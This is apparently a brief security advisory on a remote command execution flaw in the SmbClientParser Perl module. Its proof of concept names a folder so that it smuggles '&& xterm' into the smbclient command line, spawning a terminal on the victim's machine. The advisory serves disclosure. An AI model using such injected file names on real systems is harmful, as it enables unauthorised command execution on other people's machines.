|
SmbClientParser Perl Module Remote Command Execution Vulnerability
The following exploit will spawn an xterm on the victim's computer: Name a folder the following: ' x && xterm &# A shared folder containing this named folder will execute the following command: /usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc" |
|
|
Privacy Statement |